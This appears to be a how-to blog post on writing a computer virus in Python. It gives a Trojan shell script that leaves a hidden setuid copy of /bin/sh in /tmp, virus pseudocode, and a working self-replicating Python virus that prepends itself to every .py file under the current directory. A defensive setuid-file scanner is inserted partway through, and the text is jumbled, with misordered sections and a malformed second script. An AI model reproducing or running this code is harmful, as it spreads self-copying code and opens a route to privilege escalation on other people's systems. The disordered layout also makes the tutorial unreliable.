NOTE: Please don't use an online compiler; it is not going to work here. Please install Python 2.7x to the latest version and the cv2 (OpenCV) and argparse modules to actually try out this example.
Hey friends! Welcome back! Before continuing on with Malicious Logic, after reading this blog you will be able to make a Computer Virus Using Python – Within 10 Minutes. Newbie to Advance Tutorials.
Now, this article will focus more on applications than the theory of computer viruses, worms, and Trojan horses.
But please note that this article is meant to be used for educational purposes only. I am not promoting the usage of viruses, worms, or Trojan horses to attack computer systems and cause damage.
What is Malicious logic?
Malicious logic is a set of instructions (basically a program) that causes the violation of a security policy of a website/program/application, etc.
cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*
In this example, we are assuming that “………” is in the path environment and the script has been named ls and is placed in the directory.
Analyzing the script
This script creates a copy of the UNIX shell that is setuid to the user executing this program. To understand setuid programs, we first need to understand how user identity is stored in a UNIX OS.
In a UNIX OS, user identity is commonly represented as an integer between zero and, generally, 65,535. This number is also called the UID (Unique Identification Number). A setuid program creates processes with the UID of the owner, not of a third person executing the program. This means that the executor will have the rights of the owner. This in itself is a possible vulnerability.
Coming back to our script: a setuid copy of the UNIX shell was created. Afterwards, this program is deleted, and then the correct ls command (for listing the files and folders present in the current working directory) is executed.
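A defender's check for the artifact this script leaves behind, as an added example that is not part of the original article: it walks a directory tree and reports regular files with the setuid or setgid bit set, noting hidden names. The function names and the sample tree are constructed for illustration.

```python
import os
import stat
import tempfile

def find_setid_files(root):
    """Return (path, owner_uid, flags) for regular files under root with setuid/setgid set."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks out of the tree
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if not stat.S_ISREG(st.st_mode):
                continue
            flags = []
            if st.st_mode & stat.S_ISUID:
                flags.append("setuid")
            if st.st_mode & stat.S_ISGID:
                flags.append("setgid")
            if not flags:
                continue
            if name.startswith("."):
                flags.append("hidden")  # dot-files do not show up in a plain ls
            if st.st_mode & stat.S_IXOTH:
                flags.append("world-executable")
            findings.append((path, st.st_uid, flags))
    return sorted(findings)

def demo():
    """Build a constructed sample tree and scan it (no real system files are touched)."""
    root = tempfile.mkdtemp(prefix="setid-audit-")
    benign = os.path.join(root, "notes.txt")
    suspect = os.path.join(root, ".sample")  # constructed stand-in for a hidden setuid file
    for p in (benign, suspect):
        with open(p, "w") as fh:
            fh.write("placeholder\n")
    os.chmod(benign, 0o644)
    os.chmod(suspect, 0o4755)  # setuid bit plus rwxr-xr-x
    return root, find_setid_files(root)

if __name__ == "__main__":
    root, findings = demo()
    for path, uid, flags in findings:
        print("%s uid=%d %s" % (path, uid, ",".join(flags)))
```

Pointing `find_setid_files` at temporary or user-writable directories and comparing the result against a known-good baseline surfaces setuid files that have no business being there.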
Go back to the previous script… Suppose someone (root) typed:
If the script was typed deliberately, then it will result in a Trojan Horse.
Virus – A basic format
Most computer viruses follow the following basic script:
cp /bin/sh /tmp/.xxsh
chmod o+s,w+x /tmp.xxsh
Beginvirus
  if spread-condition TRUE then begin
    for the target files begin
      if target affected TRUE then begin
        Determine where to place virus instructions
        Copy the virus instructions
        Modify target to spread the virus later
      End if
    End for
  End if
  Perform some other instruction(s) //Optional
  Go back to beginning
Endvirus
Basically, every computer virus has two phases –
#!/usr/bin/python import os, datetime, inspect DATA_TO_INSERT = "CODEWITHNEPAL" #search for target files in path def search(path): filestoinfect =  filelist = os.listdir(path) for filename in filelist: #If it is a folder if os.path.isdir(path+"/"+filename): filestoinfect.extend(search(path+"/"+filename)) #If it is a python script -> Infect it elif filename[-3:] == ".py": #default value infected = False for line in open(path+"/"+filename): if DATA_TO_INSERT in line: infected = True break if infected == False: filestoinfect.append(path+"/"+filename) return filestoinfect #changes to be made in the target file def infect(filestoinfect): target_file = inspect.currentframe().f_code.co_filename virus = open(os.path.abspath(target_file)) virusstring = "" for i,line in enumerate(virus): if i>=0 and i <41: virusstring += line virus.close for fname in filestoinfect: f = open(fname) temp = f.read() f.close() f = open(fname,"w") f.write(virusstring + temp) f.close() #Not required actually def explode(): if datetime.datetime.now().month == 4 and datetime.datetime.now().day == 1: print ("HAPPY APRIL FOOL'S DAY!!") filestoinfect = search(os.path.abspath("")) infect(filestoinfect) explode()
- Insertion phase – in this phase, the virus inserts itself into the target.
- Execution phase – in this phase, the virus performs some actions.
Let’s take a look at a real virus in Python. Now, this is not an actual virus that will cause file corruption, deletion of system files, etc., but just a simple harmless virus.